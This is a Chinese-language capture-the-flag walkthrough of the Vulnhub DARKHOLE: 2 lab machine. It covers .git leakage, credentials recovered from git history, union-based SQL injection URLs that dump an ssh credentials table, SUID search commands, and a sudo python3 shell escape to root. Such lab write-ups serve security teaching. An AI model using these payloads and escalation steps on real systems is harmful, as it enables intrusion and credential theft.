Vulnhub之DARKHOLE: 2渗透测试

2022年01月14日 阅读数:1
这篇文章主要向大家介绍Vulnhub之DARKHOLE: 2渗透测试,主要内容包括基础应用、实用技巧、原理机制等方面,希望对大家有所帮助。

一、靶机概述

Description
Difficulty:Hardphp

This works better with VMware rather than VirtualBoxpython

Hint: Don’t waste your time For Brute-Forcelinux

kali:192.168.110.128
靶机:192.168.110.137git

二、信息搜集

首先探测靶机IP地址
在这里插入图片描述
扫一下端口和服务,可知靶机只开启了22和80端口。
在这里插入图片描述
咱们访问一下站点,页面存在登录接口Login。
在这里插入图片描述
点击login,跳转至登录页面
在这里插入图片描述
没有注册接口,靶机也已经提示不要浪费时间在爆破上面
右键查看一下页面源码吧
在这里插入图片描述
没有找到有用的信息。
接下来,扫描一下后台目录
在这里插入图片描述
发现存在git泄漏,并访问.git目录
在这里插入图片描述web

分析源码

获取源码:sql

wget -r //递归下载全部文件
wget -r http://192.168.110.137/.git

这将建立一个名称为 IP 地址的目录。在目录中,它包含递归下载的文件,包括“.git”。
在这里插入图片描述
按以下方式克隆shell

git clone . testweb

这将建立一个 git 存储库“testweb”,咱们能够在其中执行全部 git 操做。
在这里插入图片描述
进入config目录查看配置
在这里插入图片描述
可知数据库名为darkhole_2
继续查看login.php
在这里插入图片描述
能够看到作了防sql注入。
而后git log查看更新
在这里插入图片描述
看到第2次更新时,login.php使用了默认凭证。
所以,咱们将 HEAD 切换到该提交,并查看login.php
在这里插入图片描述
找到了用户名和密码,而后登录平台
在这里插入图片描述数据库

找了一遍,不存在上传文件的地方。
不过,将id换成2,访问返回空
在这里插入图片描述
直觉告诉我,此处,应该存在sql注入
加上单引号'访问
在这里插入图片描述
而后http://192.168.110.137/dashboard.php?id=1%27--+访问正常
在这里插入图片描述bash

三、漏洞利用

order by 猜解表中列数
在这里插入图片描述
爆表名ssh

http://192.168.110.137/dashboard.php?id=-1' union select 1,2,3,4,5,group_concat(table_name) from information_schema.tables where table_schema=database() --+

在这里插入图片描述
爆字段
由于要进入后台,咱们选择爆ssh表字段。

http://192.168.110.137/dashboard.php?id=-1' union select 1,2,3,4,5,group_concat(column_name) from information_schema.columns where table_name='ssh' --+

在这里插入图片描述
爆数据

http://192.168.110.137/dashboard.php?id=-1' union select 1,2,3,4,5,group_concat(user,0x3a,pass) from ssh  --+

在这里插入图片描述
ssh登陆jehad用户
在这里插入图片描述

四、获取losy用户shell

若是想提权到root权限,linux系统一般有如下几种方法:

  1. sudo提权,sudo -l 查询具备sudo权限命令,而后提权
  2. SUID提权,查找具备root权限的SUID的文件
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {
   
   } \;
  1. 经过在/etc/passwd添加一个root权限的帐户进行提权
find / -writable -type f 2>/dev/null
  1. 内核提权

尝试sudo和SUID提权,均失败
在这里插入图片描述
看一下历史命令cat .bash_history
在这里插入图片描述
发现可疑命令
在这里插入图片描述
执行后,发现是losy用户权限

kali上编写反弹shell,并起http服务
在这里插入图片描述
靶机上,将shell文件,下载到tmp文件夹下
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

五、提权到root

sudo -l提示须要输入密码,而咱们如今还不知道losy用户密码
在这里插入图片描述
继续查看历史命令
在这里插入图片描述
发现losy用户密码为gang
ssh登陆losy
在这里插入图片描述
sudo -l 查询发现能够使用python3提权
在这里插入图片描述

sudo /usr/bin/python3 -c  "import os;os.system('/bin/bash')"

在这里插入图片描述